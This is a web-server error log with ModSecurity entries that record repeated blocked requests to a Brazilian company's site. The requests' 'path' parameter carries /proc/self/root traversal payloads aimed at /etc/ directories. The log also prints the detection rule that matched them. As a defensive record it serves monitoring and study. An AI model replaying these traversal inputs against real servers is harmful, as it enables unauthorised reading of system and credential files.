[Mon Mar 16 18:15:28.011763 2026] [:error] [pid 29507:tid 140411691570944] [client 74.7.241.46:37092] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhy8Er9dMAiw-8KANNlfQAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:15:29.216088 2026] [:error] [pid 29507:tid 140411607643904] [client 74.7.241.46:42116] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhy8Ur9dMAiw-8KANNlfwAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:15:30.509490 2026] [:error] [pid 10831:tid 140411574073088] [client 74.7.241.46:42118] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhy8o6lpbStxTqkSkuF7AAAAlQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:15:36.192589 2026] [:error] [pid 15061:tid 140411725141760] [client 74.7.241.46:42124] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhy-KTCbgAP5jq5TehIIwAAAsI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:15:37.657501 2026] [:error] [pid 21806:tid 140411741927168] [client 74.7.241.46:42132] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhy-dSswJuvopo3lOh9kQAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:15:38.828824 2026] [:error] [pid 29507:tid 140411649607424] [client 74.7.241.46:53548] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhy-kr9dMAiw-8KANNlggAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:15:41.267576 2026] [:error] [pid 15568:tid 140411548894976] [client 74.7.241.46:53558] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhy_aQpVkWug9HeOt9QaQAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:15:44.987196 2026] [:error] [pid 10772:tid 140411666392832] [client 74.7.241.46:53574] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzAP9ocpUE4ed4uDwQcQAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:15:47.447785 2026] [:error] [pid 29802:tid 140411708356352] [client 74.7.241.46:53576] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzA8_BxrYCr4hPDw8HFgAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:15:48.813033 2026] [:error] [pid 10772:tid 140411658000128] [client 74.7.241.46:47360] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzBP9ocpUE4ed4uDwQdAAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:15:51.067476 2026] [:error] [pid 15061:tid 140411716749056] [client 74.7.241.46:47374] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzB6TCbgAP5jq5TehILAAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:15:52.396934 2026] [:error] [pid 10651:tid 140411641214720] [client 74.7.241.46:47390] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzCLysWC90G-1nBrBhXgAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:15:53.695909 2026] [:error] [pid 10831:tid 140411674785536] [client 74.7.241.46:47400] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzCY6lpbStxTqkSkuF8AAAAkg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:15:54.461607 2026] [:error] [pid 14895:tid 140411666392832] [client 74.7.243.203:51902] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzClajLEzk2WiQ-10u_gAAAok"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:15:55.007139 2026] [:error] [pid 15568:tid 140411683178240] [client 74.7.241.46:47416] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzC6QpVkWug9HeOt9QbwAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:15:55.770827 2026] [:error] [pid 15568:tid 140411708356352] [client 74.7.243.203:40766] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzC6QpVkWug9HeOt9QcAAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:15:58.476493 2026] [:error] [pid 10831:tid 140411658000128] [client 74.7.241.46:47420] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzDo6lpbStxTqkSkuF8wAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:15:59.215351 2026] [:error] [pid 10772:tid 140411540502272] [client 74.7.243.203:40782] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzD_9ocpUE4ed4uDwQfgAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:15:59.811139 2026] [:error] [pid 14895:tid 140411582465792] [client 74.7.241.46:39670] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzD1ajLEzk2WiQ-10u_wAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:16:02.423826 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.241.46:39676] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzEtSswJuvopo3lOh9mwAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:16:04.819860 2026] [:error] [pid 14895:tid 140411607643904] [client 74.7.241.46:39692] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzFFajLEzk2WiQ-10vCQAAApA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:16:06.147385 2026] [:error] [pid 21806:tid 140411557287680] [client 74.7.241.46:39698] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzFtSswJuvopo3lOh9ngAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
